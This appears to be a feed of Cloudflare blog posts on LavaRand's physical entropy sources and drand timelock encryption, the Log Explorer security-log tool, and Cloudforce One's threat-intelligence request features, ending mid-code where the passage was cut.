Cloudflare’s servers collectively handle upwards of 55 million HTTP requests per second, the vast majority of which are secured via the TLS protocol to ensure authenticity and confidentiality. Under the hood, cryptographic protocols like TLS require an underlying source of secure randomness – otherwise, the security guarantees fall apart.

Secure randomness used in cryptography needs to be computationally indistinguishable from “true” randomness. For this, it must both pass statistical randomness tests and be unpredictable to any computationally bounded adversary, no matter how much previous output they’ve already seen. The typical way to achieve this is to take some random ‘seed’ and feed it into a Cryptographically Secure Pseudorandom Number Generator (CSPRNG) that can produce an essentially endless stream of unpredictable bytes upon request. The properties of a CSPRNG ensure that all outputs are practically indistinguishable from truly random outputs to anyone who does not know its internal state. However, this all depends on having a secure random seed to begin with. Take a look at this blog for more details on true randomness versus pseudorandomness, and this blog for some great examples of what can go wrong with insecure randomness.

For many years, Cloudflare’s servers relied on local sources of entropy (such as the precise timing of packet arrivals or keyboard events) to seed their entropy pools. While there’s no reason to believe that the local entropy sources on those servers are insecure or could be easily compromised, we wanted to hedge our bets against that possibility. Our solution was to set up a system where our servers could periodically refresh their entropy pools with true randomness from an external source.

That brings us to LavaRand. “Lavarand” has long been the name given to systems used for the generation of randomness (first by Silicon Graphics in 1997). Cloudflare launched its own instantiation of LavaRand in 2017: a system that collects entropy from the wall of lava lamps in our San Francisco office and makes it available via an internal API. Our servers then periodically query the API to retrieve fresh randomness from LavaRand and incorporate it into their entropy pools. The contributions made by LavaRand can be considered spice added to the entropy pool mix! (For more technical details, read our previous blog post.)

Lava lamps in Cloudflare’s San Francisco office.

Adding to the office chaos

Our lava lamps in San Francisco have been working tirelessly for years to supply fresh entropy to our systems, but they now have siblings across the world to help with their task! As Cloudflare has grown, so has the variety of entropy sources found in and sourced from our offices. Cloudflare’s Places team works hard to ensure that our offices reflect aspects of our values and culture. Several of our larger office locations include installations of physical systems of entropy, and it is these installations that we have worked to incorporate into LavaRand over time. The tangible and exciting draw of these systems is their basis in physical mechanics that we intuitively consider random. The gloops of warmed ascending “lava” floating past cooler sinking blobs within lava lamps attract our attention just as other unpredictable (and often beautiful) dynamic systems capture our interest.

London’s unpredictable pendulums

Visible to visitors of our London office is a wall of double pendulums whose beautiful swings translate to another source of entropy to LavaRand and to the pool of randomness that Cloudflare’s servers pull from.

Close-up of double pendulum display in Cloudflare’s London office.

To the untrained eye the shadows of the pendulum stands and those cast by the rotating arms on the rear wall might seem chaotic. If so, then this installation should be labeled a success! Different light conditions and those shadows add to the chaos that is captured from this entropy source.

Double pendulum display in Cloudflare’s London office with changing light conditions.

Indeed, even with these arms restricted to motion in two dimensions, the path traced by the arms is mesmerizingly varied, and can be shown to be mathematically chaotic. Even if we ignore air resistance, temperature, and the environment, and assume that the motion is completely deterministic, the resulting long-term motion is still hard to predict. In particular, the system is very sensitive to initial conditions: the initial state (how the arms are set in motion) paired with deterministic behavior produces a unique path that is traced until the pendulum comes to rest and is set in motion once again by a Cloudflare employee in London.

Austin’s mesmerizing mobiles

The beautiful new Cloudflare office in Austin, Texas recently celebrated its first year since opening. This office contributes its own spin on physical entropy: suspended above the entrance of the Cloudflare office in downtown Austin is an installation of translucent rainbow mobiles. These twirl, reflecting the changing light, and cast coloured patterns on the enclosing walls. The display of hanging mobiles and their shadows are very sensitive to a physical environment which includes the opening and closing of doors, HVAC changes, and ambient light. This chaotic system’s mesmerizing and changing scene is captured periodically and fed into the stream of LavaRand randomness.

Hanging rainbow mobiles in Cloudflare’s Austin office.

Mixing new sources into LavaRand

We incorporated the new sources of office chaos into the LavaRand system (still called LavaRand despite including much more than lava lamps) in the same way as the existing lava lamps, which we’ve previously described in detail.

To recap, at repeated intervals, a camera captures an image of the current state of the randomness display. Since the underlying system is truly random, the produced image contains true randomness. Even shadows and changing light conditions play a part in producing something unique and unpredictable! There is another secret that we should share: at a base level, image sensors in the real world are often a source of sufficient noise that even images taken with the lens cap on could work well as a source of entropy! We consider this added noise to be a serendipitous addition to the beautiful chaotic motion of these installations.

Close-up of hanging rainbow mobiles in Cloudflare’s Austin office.

Once we have a still image that captures the state of the randomness display at a particular point in time, we compute a compact representation – a hash – of the image to derive a fixed-size output of truly random bytes.

Process of converting physical entropy displays into random byte strings.

The random bytes are then used as input (along with the previous seed and some randomness from the system’s local entropy sources) to a Key Derivation Function (KDF) to compute a new randomness seed, which in turn is fed into a CSPRNG to produce the essentially endless stream of unpredictable bytes described earlier. LavaRand then exposes this stream of randomness via a simple internal API where clients can request fresh randomness.

seed = KDF(new image || previous seed || system randomness)
rng = CSPRNG(seed)
…
rand1 = rng.random()
rand2 = rng.random()
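To make the pseudocode above concrete, here is a hedged TypeScript sketch of the same derivation using the Web Crypto API, with HKDF playing the role of the KDF. A real deployment would feed the derived seed into a full CSPRNG rather than using the bytes directly:

// Sketch of the seed derivation above using the Web Crypto API, with HKDF
// playing the role of the KDF. A real deployment would feed the derived seed
// into a full CSPRNG (e.g. ChaCha-based) rather than using the bytes directly.
async function nextSeed(
  image: Uint8Array,        // camera capture of the randomness display
  previousSeed: Uint8Array, // seed from the previous iteration
): Promise<Uint8Array> {
  const imageHash = await crypto.subtle.digest("SHA-256", image);
  const systemRandomness = crypto.getRandomValues(new Uint8Array(32));

  // ikm = new image hash || previous seed || system randomness
  const ikm = new Uint8Array([
    ...new Uint8Array(imageHash), ...previousSeed, ...systemRandomness,
  ]);

  const key = await crypto.subtle.importKey("raw", ikm, "HKDF", false, ["deriveBits"]);
  const bits = await crypto.subtle.deriveBits(
    { name: "HKDF", hash: "SHA-256", salt: new Uint8Array(32), info: new Uint8Array() },
    key,
    256, // 32-byte seed
  );
  return new Uint8Array(bits);
}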

How can I use LavaRand?

Applications typically use secure randomness in one of two flavors: private and public.

Private randomness is used for generating passwords, cryptographic keys, user IDs, and other values that are meant to stay secret forever. As we’ve previously described, our servers periodically request fresh private randomness from LavaRand to help update their entropy pools. Because of this, randomness from LavaRand is essentially available to the outside world! One easy way for developers to tap into private randomness from LavaRand is to use the Web Crypto API’s getRandomValues function from a Cloudflare Worker, or use one that someone has already built, like csprng.xyz (source).
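For example, here is a minimal sketch of a Worker that serves 32 bytes of randomness using getRandomValues:

// Minimal sketch of a Cloudflare Worker serving fresh random bytes via the
// Web Crypto API; getRandomValues draws from the runtime's CSPRNG.
export default {
  async fetch(): Promise<Response> {
    const bytes = crypto.getRandomValues(new Uint8Array(32));
    const hex = [...bytes].map((b) => b.toString(16).padStart(2, "0")).join("");
    return new Response(hex, { headers: { "Content-Type": "text/plain" } });
  },
};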

Public randomness consists of unpredictable and unbiased random values that are made available to everyone once they are published, and for this reason should not be used for generating cryptographic keys. The winning lottery numbers and the coin flip at the start of a sporting event are some examples of public random values. A double-headed coin would not be an unbiased and unpredictable source of entropy and would have drastic impacts on the sports betting world.

In addition to being unpredictable and unbiased, it’s also desirable for public randomness to be trustworthy so that consumers of the randomness are assured that the values were faithfully produced. Not many people would buy lottery tickets if they believed that the winning ticket was going to be chosen unfairly! Indeed, there are known cases of corrupt insiders subverting public randomness for personal gain, like the state lottery employee who co-opted the lottery random number generator, allowing his friends and family to win millions of dollars.

A fundamental challenge of public randomness is that one must trust the authority producing the random outputs. Trusting a well-known authority like NIST may suffice for many applications, but could be problematic for others (especially for applications where decentralization is important).

drand: distributed and verifiable public randomness

To help solve this problem of trust, Cloudflare joined forces with seven other independent and geographically distributed organizations back in 2019 to form the League of Entropy to launch a public randomness beacon using the drand (pronounced dee-rand) protocol. Each organization contributes its own unique source of randomness into the joint pool of entropy used to seed the drand network – with Cloudflare using randomness from LavaRand, of course!

While the League of Entropy started out as an experimental network, with the guidance and support from the drand team at Protocol Labs, it’s become a reliable and production-ready core Internet service, relied upon by applications ranging from distributed file storage to online gaming to timestamped proofs to timelock encryption (discussed further below). The League of Entropy has also grown, and there are now 18 organizations across four continents participating in the drand network.

The League of Entropy’s drand beacons (each of which runs with different parameters, such as how frequently random values are produced and whether the randomness is chained – more on this below) have two important properties that contribute to their trustworthiness: they are decentralized and verifiable. Decentralization ensures that one or two bad actors cannot subvert or bias the randomness beacon, and verifiability allows anyone to check that the random values are produced according to the drand protocol and with participation from a threshold (at least half, but usually more) of the participants in the drand network. Thus, with each new member, the trustworthiness and reliability of the drand network continues to increase.

We give a brief overview of how drand achieves these properties using distributed key generation and threshold signatures below, but for an in-depth dive see our previous blog post and some of the excellent posts from the drand team.

Distributed key generation and threshold signatures

During the initial setup of a drand beacon, nodes in the network run a distributed key generation (DKG) protocol based on the Pedersen commitment scheme, the result of which is that each node holds a “share” (a keypair) for a distributed group key, which remains fixed for the lifetime of the beacon. In order to do something useful with the group secret key like signing a message, at least a threshold (for example 7 out of 9) of nodes in the network must participate in constructing a BLS threshold signature. The group information for the quicknet beacon on the League of Entropy’s mainnet drand network is shown below:

curl -s https://drand.cloudflare.com/52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971/info | jq
{
  "public_key": "83cf0f2896adee7eb8b5f01fcad3912212c437e0073e911fb90022d3e760183c8c4b450b6a0a6c3ac6a5776a2d1064510d1fec758c921cc22b0e17e63aaf4bcb5ed66304de9cf809bd274ca73bab4af5a6e9c76a4bc09e76eae8991ef5ece45a",
  "period": 3,
  "genesis_time": 1692803367,
  "hash": "52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971",
  "groupHash": "f477d5c89f21a17c863a7f937c6a6d15859414d2be09cd448d4279af331c5d3e",
  "schemeID": "bls-unchained-g1-rfc9380",
  "metadata": {
    "beaconID": "quicknet"
  }
}

(The hex value 52db9b… in the URL above is the hash of the beacon’s configuration. Visit https://drand.cloudflare.com/chains to see all beacons supported by our mainnet drand nodes.)

The nodes in the network are configured to periodically (every 3s for quicknet) work together to produce a signature over some agreed-upon message, like the current round number and previous round signature (more on this below). Each node uses its share of the group key to produce a partial signature over the current round message, and broadcasts it to other nodes in the network. Once a node has enough partial signatures, it can aggregate them to produce a group signature for the given round.

curl -s https://drand.cloudflare.com/52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971/public/13335 | jq
{
  "round": 13335,
  "randomness": "f4eb2e59448d155b1bc34337f2a4160ac5005429644ba61134779a8b8c6087b6",
  "signature": "a38ab268d58c04ce2d22b8317e4b66ecda5fa8841c7215bf7733af8dbaed6c5e7d8d60b77817294a64b891f719bc1b40"
}

The group signature for a round is the randomness (in the output above, the randomness value is simply the sha256 hash of the signature, for applications that prefer a shorter, fixed-size output). The signature is unpredictable in advance as long as enough (at least a majority, but this can be configured to be higher) of the nodes in the drand network are honest and do not collude. Further, anyone can validate the signature for a given round using the beacon’s group public key. It’s recommended that developers use the drand client libraries or CLI to perform verification on every value obtained from the beacon.
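You can check the relationship between the signature and the randomness yourself: hashing the round 13335 signature above with SHA-256 should reproduce the randomness field. A small TypeScript sketch:

// Check that randomness == sha256(signature) for round 13335 shown above.
// (This verifies the derivation only; use a drand client library to verify
// the BLS signature itself against the group public key.)
const hexToBytes = (hex: string) =>
  new Uint8Array(hex.match(/../g)!.map((b) => parseInt(b, 16)));
const bytesToHex = (buf: ArrayBuffer) =>
  [...new Uint8Array(buf)].map((b) => b.toString(16).padStart(2, "0")).join("");

const signature =
  "a38ab268d58c04ce2d22b8317e4b66ecda5fa8841c7215bf7733af8dbaed6c5e7d8d60b77817294a64b891f719bc1b40";
const digest = await crypto.subtle.digest("SHA-256", hexToBytes(signature));
console.log(bytesToHex(digest));
// expected: f4eb2e59448d155b1bc34337f2a4160ac5005429644ba61134779a8b8c6087b6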

Chained vs unchained randomness

When the League of Entropy launched its first generation of drand beacons in 2019, the per-round message over which the group signature was computed included the previous round’s signature. This creates a chain of randomness rounds all the way to the first “genesis” round. Chained randomness provides some nice properties for single-source randomness beacons, and is included as a requirement in NIST’s spec for interoperable public randomness beacons.

However, back in 2022 the drand team introduced the notion of unchained randomness, where the message to be signed is predictable and doesn’t depend on any randomness from previous rounds, and showed that it provides the same security guarantees as chained randomness for the drand network (both require an honest threshold of nodes). In the implementation of unchained randomness in the quicknet, the message to be signed simply consists of the round number.

# chained randomness
signature = group_sign(round || previous_signature)

# unchained randomness
signature = group_sign(round)

Unchained randomness provides some powerful properties and usability improvements. In terms of usability, a consumer of the randomness beacon does not need to reconstruct the full chain of randomness to the genesis round to fully validate a particular round – the only information needed is the current round number and the group public key. This provides much more flexibility for clients, as they can choose how frequently they consume randomness rounds without needing to continuously follow the randomness chain.

Since the messages to be signed are known in advance (since they’re just the round number), unchained randomness also unlocks a powerful new property: timelock encryption.

Rotating double pendulums.

Timelock encryption

Timelock (or “timed-release”) encryption is a method for encrypting a message such that it cannot be decrypted until a certain amount of time has passed. Two basic approaches to timelock encryption were described by Rivest, Shamir, and Wagner:

 There are two natural approaches to implementing timed release cryptography:

  - Use “time-lock puzzles” – computational problems that cannot be solved without running a computer continuously for at least a certain amount of time.

  - Use trusted agents who promise not to reveal certain information until a specified date.

Using trusted agents has the obvious problem of ensuring that the agents are trustworthy. Secret sharing approaches can be used to alleviate this concern.

The drand network is a group of independent agents using secret sharing for trustworthiness, and the ‘certain information’ not to be revealed until a specified date sounds a lot like the per-round randomness! We describe next how timelock encryption can be implemented on top of a drand network with unchained randomness, and finish with a practical demonstration. While we don’t delve into the bilinear groups and pairings-based cryptography that make this possible, if you’re interested we encourage you to read tlock: Practical Timelock Encryption from Threshold BLS by Nicolas Gailly, Kelsey Melissaris, and Yolan Romailler.

How to timelock your secrets

First, identify the randomness round that, once revealed, will allow your timelock-encrypted message to be decrypted. An important observation is that since drand networks produce randomness at fixed intervals, each round in a drand beacon is closely tied to a specific timestamp (modulo small delays for the network to actually produce the beacon), which can be computed by taking the beacon’s genesis timestamp and adding the round number multiplied by the beacon’s period.
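
Here’s a minimal TypeScript sketch of that computation. The genesis timestamp and 3-second period below are assumed values for quicknet; in practice, read them from the beacon’s chain info rather than hardcoding them:

// Map a wall-clock time to the drand round produced at (or just after) it.
const genesisTime = 1692803367; // unix seconds; quicknet genesis (assumed here)
const period = 3; // seconds per round for quicknet

function roundAt(unixSeconds: number): number {
  if (unixSeconds <= genesisTime) return 1;
  return Math.floor((unixSeconds - genesisTime) / period) + 1;
}

// For example, the round roughly one minute (about 20 rounds) from now:
console.log(roundAt(Math.floor(Date.now() / 1000) + 60));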

Once the round is decided upon, the properties of bilinear groups allow you to encrypt your message to some round with the drand beacon’s group public key.

ciphertext = EncryptToRound(msg, round, beacon_public_key)

After the nodes in the drand network cooperate to derive the randomness for the round (really, just the signature on the round number using the beacon’s group secret key), anyone can decrypt the ciphertext (this is where the magic of bilinear groups comes in).

random = Randomness(round)
message = Decrypt(ciphertext, random)

To make this practical, the timelocked message is actually the secret key for a symmetric encryption scheme: we encrypt the message with a symmetric key, and then timelock-encrypt that key, allowing the message to be decrypted once the chosen round arrives.
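
The symmetric half of that hybrid construction might look like the sketch below, using Node’s crypto module with AES-256-GCM. The timelock step itself would come from a tlock library and is only indicated in comments, since its exact interface varies:

import { createCipheriv, randomBytes } from "node:crypto";

// Seal the message under a fresh one-time symmetric key...
const key = randomBytes(32); // AES-256 key; this is what gets timelock-encrypted
const iv = randomBytes(12);
const cipher = createCipheriv("aes-256-gcm", key, iv);
const body = Buffer.concat([
  cipher.update("A message from the past to the future...", "utf8"),
  cipher.final(),
]);
const tag = cipher.getAuthTag();

// ...then timelock-encrypt only `key` to the chosen round using a tlock
// library, e.g. lockedKey = timelockEncrypt(round, key, ...) (illustrative).
// Once the round's signature is published, anyone can recover `key` and
// decrypt `body` with AES-256-GCM using `iv` and `tag`.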

Now, for a practical demonstration of timelock encryption, we use a tool that one of our own engineers built on top of Cloudflare Workers. The source code is publicly available if you’d like to take a look under the hood at how it works.

# 1. Create a file
echo "A message from the past to the future..." > original.txt

# 2. Get the drand round 1 minute into the future (20 rounds) 
BEACON="52db9ba70e0cc0f6eaf7803dd07447a1f5477735fd3f661792ba94600c84e971"
ROUND=$(curl -s "https://drand.cloudflare.com/$BEACON/public/latest" | jq ".round+20")

# 3. Encrypt and require that round number
curl -X POST --data-binary @original.txt --output encrypted.pem https://tlock-worker.crypto-team.workers.dev/encrypt/$ROUND

# 4. Try to decrypt it (and only succeed 20 rounds x 3s later)
curl -X POST --data-binary @encrypted.pem --fail --show-error https://tlock-worker.crypto-team.workers.dev/decrypt

What’s next?

We hope you’ve enjoyed revisiting the tale of LavaRand as much as we have, and are inspired to visit one of Cloudflare’s offices in the future to see the randomness displays first-hand, and to use verifiable public randomness and timelock encryption from drand in your next project.

Chaos is required by the encryption that secures the Internet. LavaRand at Cloudflare will continue to turn the chaotic beauty of our physical world into a stream of randomness, even as new sources are added, for novel uses that all of us explorers (just like that snail) have yet to dream up.

And she gazed at the sky, the sea, the land
The waves and the caves and the golden sand.
She gazed and gazed, amazed by it all,
And she said to the whale, “I feel so small.”

A snail on a whale.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Log Explorer: monitor security events without third-party storage

Post Syndicated from Jen Sells original https://blog.cloudflare.com/log-explorer


Today, we are excited to announce beta availability of Log Explorer, which allows you to investigate your HTTP and Security Event logs directly from the Cloudflare Dashboard. Log Explorer is an extension of Security Analytics, giving you the ability to review related raw logs. You can analyze, investigate, and monitor for security attacks natively within the Cloudflare Dashboard, reducing time to resolution and overall cost of ownership by eliminating the need to forward logs to third-party security analysis tools.

Background

Security Analytics enables you to analyze all of your HTTP traffic in one place, giving you the security lens you need to identify and act upon what matters most: potentially malicious traffic that has not been mitigated. Security Analytics includes built-in views such as top statistics and in-context quick filters on an intuitive page layout that enables rapid exploration and validation.

In order to power our rich analytics dashboards with fast query performance, we implemented data sampling using Adaptive Bit Rate (ABR) analytics. This is a great fit for providing high level aggregate views of the data. However, we received feedback from many Security Analytics power users that sometimes they need access to a more granular view of the data — they need logs.

Logs provide critical visibility into the operations of today’s computer systems. Engineers and SOC analysts rely on logs every day to troubleshoot issues, identify and investigate security incidents, and tune the performance, reliability, and security of their applications and infrastructure. Traditional metrics or monitoring solutions provide aggregated or statistical data that can be used to identify trends. Metrics are wonderful at identifying THAT an issue happened, but lack the detailed events to help engineers uncover WHY it happened. Engineers and SOC Analysts rely on raw log data to answer questions such as:

  • What is causing this increase in 403 errors?
  • What data was accessed by this IP address?
  • What was the user experience of this particular user’s session?

Traditionally, these engineers and analysts would stand up a collection of various monitoring tools in order to capture logs and get this visibility. With more organizations using multiple clouds, or a hybrid environment with both cloud and on-premises tools and architecture, it is crucial to have a unified platform to regain visibility into this increasingly complex environment. As more and more companies move toward a cloud-native architecture, we see Cloudflare’s connectivity cloud as an integral part of their performance and security strategy.

Log Explorer provides a lower-cost option for storing and exploring log data within Cloudflare. Until today, we offered the ability to export logs to expensive third-party tools; now, with Log Explorer, you can quickly and easily explore your log data without leaving the Cloudflare Dashboard.

Log Explorer Features

Whether you’re a SOC Engineer investigating potential incidents, or a Compliance Officer with specific log retention requirements, Log Explorer has you covered. It stores your Cloudflare logs for an uncapped and customizable period of time, making them accessible natively within the Cloudflare Dashboard. The supported features include:

  • Searching through your HTTP Request or Security Event logs
  • Filtering based on any field and a number of standard operators
  • Switching between basic filter mode or SQL query interface
  • Selecting fields to display
  • Viewing log events in tabular format
  • Finding the HTTP request records associated with a Ray ID

Narrow in on unmitigated traffic

As a SOC analyst, your job is to monitor and respond to threats and incidents within your organization’s network. Using Security Analytics, and now with Log Explorer, you can identify anomalies and conduct a forensic investigation all in one place.

Let’s walk through an example to see this in action:

On the Security Analytics dashboard, you can see in the Insights panel that there is some traffic that has been tagged as a likely attack, but not mitigated.

Clicking the filter button narrows in on these requests for further investigation.

In the sampled logs view, you can see that most of these requests are coming from a common client IP address.

You can also see that Cloudflare has flagged all of these requests as bot traffic. With this information, you can craft a WAF rule to either block all traffic from this IP address, or block all traffic with a bot score lower than 10.

Let’s say that the Compliance Team would like to gather documentation on the scope and impact of this attack. We can dig further into the logs during this time period to see everything that this attacker attempted to access.

First, we can use Log Explorer to query HTTP requests from the suspect IP address during the time range of the spike seen in Security Analytics.

We can also review whether the attacker was able to exfiltrate data by adding the OriginResponseBytes field and updating the query to show requests with OriginResponseBytes > 0. The results show that no data was exfiltrated.

Find and investigate false positives

With access to the full logs via Log Explorer, you can now perform a search to find specific requests.

A 403 error occurs when a user’s request to a particular site is blocked. Cloudflare’s security products use signals such as IP reputation and machine-learning-based WAF attack scores to assess whether a given HTTP request is malicious. This is extremely effective, but sometimes requests are mistakenly flagged as malicious and blocked.

In these situations, we can now use Log Explorer to identify these requests and why they were blocked, and then adjust the relevant WAF rules accordingly.

Or, if you are interested in tracking down a specific request by Ray ID, an identifier given to every request that goes through Cloudflare, you can do that via Log Explorer with one query.

Note that the LIMIT clause is included in the query by default, but has no impact on RayID queries as RayID is unique and only one record would be returned when using the RayID filter field.

How we built Log Explorer

With Log Explorer, we have built a long-term, append-only log storage platform on top of Cloudflare R2. Log Explorer leverages the Delta Lake protocol, an open-source storage framework for building highly performant, ACID-compliant databases atop a cloud object store. In other words, Log Explorer combines a large and cost-effective storage system – Cloudflare R2 – with the benefits of strong consistency and high performance. Additionally, Log Explorer gives you a SQL interface to your Cloudflare logs.

Each Log Explorer dataset is stored on a per-customer level, just like Cloudflare D1, so that your data isn’t placed with that of other customers. In the future, this single-tenant storage model will give you the flexibility to create your own retention policies and decide in which regions you want to store your data.

Under the hood, the datasets for each customer are stored as Delta tables in R2 buckets. A Delta table is a storage format that organizes Apache Parquet objects into directories using Hive’s partitioning naming convention. Crucially, Delta tables pair these storage objects with an append-only, checkpointed transaction log. This design allows Log Explorer to support multiple writers with optimistic concurrency.

Many of the products Cloudflare builds are a direct result of the challenges our own team is looking to address. Log Explorer is a perfect example of this culture of dogfooding. Optimistic concurrent writes require atomic updates in the underlying object store, and as a result of our needs, R2 added a PutIfAbsent operation with strong consistency. Thanks, R2! The atomic operation sets Log Explorer apart from Delta Lake solutions based on Amazon Web Services’ S3, which incur the operational burden of using an external store for synchronizing writes.

Log Explorer is written in the Rust programming language using open-source libraries, such as delta-rs, a native Rust implementation of the Delta Lake protocol, and Apache Arrow DataFusion, a very fast, extensible query engine. At Cloudflare, Rust has emerged as a popular choice for new product development due to its safety and performance benefits.

What’s next

We know that application security logs are only part of the puzzle in understanding what’s going on in your environment. Stay tuned for future developments including tighter, more seamless integration between Analytics and Log Explorer, the addition of more datasets including Zero Trust logs, the ability to define custom retention periods, and integrated custom alerting.

Please use the feedback link to let us know how Log Explorer is working for you and what else would help make your job easier.

How to get it

We’d love to hear from you! Let us know if you are interested in joining our Beta program by completing this form and a member of our team will contact you.

Pricing will be finalized prior to a General Availability (GA) launch.

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams

Post Syndicated from Javier Castro original https://blog.cloudflare.com/threat-intel-rfi-pir


Cloudforce One is our threat operations and research team. Its primary objective: track and disrupt threat actors targeting Cloudflare and the customer systems we protect. Cloudforce One customers can engage directly with analysts on the team to help understand and stop the specific threats targeting them.

Today, we are releasing in general availability two new tools that will help Cloudforce One customers get the best value out of the service by helping us prioritize and organize the information that matters most to them: Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs). We’d also like to review how we’ve used the Cloudflare Workers and Pages platform to build our internal pipeline to not only perform investigations on behalf of our customers, but conduct our own internal investigations of the threats and attackers we track.

What are Requests for Information (RFIs)?

RFIs are designed to streamline the process of accessing critical intelligence. They provide an avenue for users to submit specific queries and requests directly into Cloudforce One’s analysis queue. Essentially, they are a well-structured way for you to tell the team what to focus their research on to best support your security posture.

Each RFI filed is routed to an analyst and treated as a targeted call for information on specific threat elements. From malware analysis to DDoS attack analysis, we have a group of seasoned threat analysts who can provide deeper insight into a wide array of attacks. Those who have found RFIs invaluable typically belong to Security Operations Centers, Incident Response Teams, and Threat Research/Intelligence teams dedicated to supporting internal investigations within an organization. This approach proves instrumental in unveiling potential vulnerabilities and enhancing understanding of an organization’s security posture, especially when confronting complex risks.

Creating an RFI is straightforward. Through the Security Center dashboard, users can create and track their RFIs:

  1. Submission: Submit requests via Cloudforce One RFI Dashboard:
    a. Threat: The threat or campaign you would like more information on
    b. Priority: routine, high or urgent
    c. Type: Binary Analysis, Indicator Analysis, Traffic Analysis, Threat Detection Signature, Passive DNS Resolution, DDoS Attack or Vulnerability
    d. Output: Malware Analysis Report, Indicators of Compromise, or Threat Research Report
  2. Tracking: Our Threat Research team begins work and the customer can track progress (open, in progress, pending, published, complete) via the RFI Dashboard. Automated alerts are sent to the customer with each status change.
  3. Delivery: Customers can access/download the RFI response via the RFI Dashboard.
Fabricated example of the detailed view of an RFI and communication with the Cloudflare Threat Research Team

Once an RFI is submitted, teams can stay informed about the progress of their requests through automated alerts. These alerts, generated when a Cloudforce One analyst has completed the request, are delivered directly to the user’s email or to a team chat channel via a webhook.

What are Priority Intelligence Requirements (PIRs)?

Priority Intelligence Requirements (PIRs) are a structured approach to identifying intelligence gaps, formulating precise requirements, and organizing them into categories that align with Cloudforce One’s overarching goals. For example, you can create a PIR signaling to the Cloudforce One team what topic you would like more information on.

PIR dashboard with fictitious examples of priority intelligence requirements

PIRs help target your intelligence collection efforts toward the most relevant insights, enabling you to make informed decisions and strengthen your organization’s cybersecurity posture.

While PIRs currently offer a framework for prioritizing intelligence requirements, our vision extends beyond static requirements. Looking ahead, we plan to evolve PIRs into dynamic tools enriched with real-time intelligence from Cloudforce One, providing immediate insights into your Cloudflare environment and facilitating a direct and meaningful connection between ongoing threat intelligence and your predefined intelligence needs.

What drives Cloudforce One?

Since our inception, Cloudforce One has been actively collaborating with our Security Incident Response Team (SIRT) and Trust and Safety (T&S) team, aiming to provide valuable insights into attacks targeting Cloudflare and counteract the misuse of Cloudflare services. Throughout these investigations, we recognized the need for a centralized platform to capture insights from Cloudflare’s unique perspective on the Internet, aggregate data, and correlate reports.

In the past, our approach would have involved deploying a frontend UI and backend API in a core data center, leveraging common services like Postgres, Redis, and a Ceph storage solution. This conventional route would have entailed managing Docker deployments, constantly upgrading hosts for vulnerabilities, and dealing with a complex environment where we must juggle secrets, external service configurations, and maintaining availability.

Instead, we welcomed being Customer Zero for Cloudflare and fully embraced Cloudflare’s Workers and Pages platforms to construct a powerful threat investigation tool, and since then, we haven’t looked back. For anyone who has used Workers in the past, much of what we have done is not revolutionary, but almost commonplace given the ease of configuring and implementing features in Cloudflare Workers. We routinely store file data in R2, metadata in KV, and indexed data in D1. That being said, we do have a few non-standard deployments as well, further outlined below.

Altogether, our Threats Investigation architecture consists of five services, four of which are deployed at the edge, with the fifth deployed in our core data centers due to data dependency constraints.

  • RFIs & PIRs: This API manages our formal Cloudforce One requests and customer priorities submitted via the Cloudflare Dashboard.
  • Threats: Our UI, deployed via Pages, serves as the interface for interacting with all of our Cloudforce One services, Cloudflare internal services, and the RFIs and PIRs submitted by our customers.
  • Cases: A case management system that allows analysts to store notes, Indicators of Compromise (IOCs), malware samples, and data analytics related to an attack. The service provides live updates to all analysts viewing the case, facilitating real-time collaboration. Each case is a Durable Object, connected to via a WebSocket, that stores “files” and “file content” in the Durable Object’s persistent storage. Metadata for the case is made searchable via D1.
  • Leads: A queue of informal internal and external requests that may be reviewed by Cloudforce One when doing threat hunting discovery. Lead content is stored into KV, while metadata and extracted IOCs are stored in D1.
  • Binary DB: A raw binary file warehouse for any file we come across during our investigation. Binary DB also serves as the repository for malware samples used in some of our machine learning training. Each file is stored in R2, with its associated metadata stored in KV.
Cloudforce One Threat Investigation Architecture

At the heart of our Threats ecosystem is our case management service built on Workers and Durable Objects. We were inspired to build this tool because we often had to jump into collaborative documents that were not designed to store forensic data, organize it, mark sections with Traffic Light Protocol (TLP) releasability codes, and relate analysis to existing RFIs or Leads.

Our concept of cases is straightforward — each case is a Durable Object that can accept HTTP REST API or WebSocket connections. Upon initiating a WebSocket connection, it is seamlessly incorporated into the Durable Object’s in-memory state, allowing us to instantly broadcast real-time events to all users engaged with the case. Each case comprises distinct folders, each housing a collection of files containing content, releasability information, and file metadata.

Practically, our Durable Object leverages its persistent storage, with each storage key prefixed by the value type (“case”, “folder”, or “file”) followed by the UUID assigned to that value. Each case value has metadata associated with the case and a list of folders that belong to the case. Each folder has the folder’s name and a list of files that belong to it.
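
A sketch of what writing into that layout might look like from inside the Durable Object is below; the record shapes and helper function are illustrative assumptions, not our actual schema:

interface FolderRecord { name: string; files: string[] } // file UUIDs
interface FileRecord { content: string; releasability: string } // e.g. a TLP code

async function addFile(storage: DurableObjectStorage, folderId: string, file: FileRecord): Promise<string> {
  const fileId = crypto.randomUUID();
  const folder = await storage.get<FolderRecord>(`folder${folderId}`);
  if (!folder) throw new Error("unknown folder");
  folder.files.push(fileId);
  // Both writes go through the Durable Object's transactional storage.
  await storage.put(`file${fileId}`, file);
  await storage.put(`folder${folderId}`, folder);
  return fileId;
}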

Our internal Threats UI ties together these service integrations with our threat hunting analysis. It is here that we do our day-to-day work, which allows us to bring our unique insights into attacks on Cloudflare. Below is an example of our Case Management in action, where we tracked the RedAlerts attack before we formalized our analysis into a blog post.

What good is all of this if we can’t search it? The Workers AI team launched Vectorize and enabled inference on the edge, so we decided to go all in on Workers and began indexing all case files as they’re being edited, making them searchable. As each case file is updated in the Durable Object, the content of the file is pushed to Cloudflare Queues. This data is consumed by an indexing engine that does two things: extracts and indexes indicators of compromise, and embeds the content into a vector that is pushed into Vectorize. Both search mechanisms also store the referencing case and file identifiers so that the case can be found upon searching.
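
A simplified version of that consumer is sketched below, assuming Workers AI and Vectorize bindings configured in wrangler.toml; the binding names, message shape, and embedding model are illustrative:

interface Env {
  AI: Ai;
  INDEX: VectorizeIndex;
}

type CaseFileMessage = { caseId: string; fileId: string; content: string };

export default {
  async queue(batch: MessageBatch<CaseFileMessage>, env: Env): Promise<void> {
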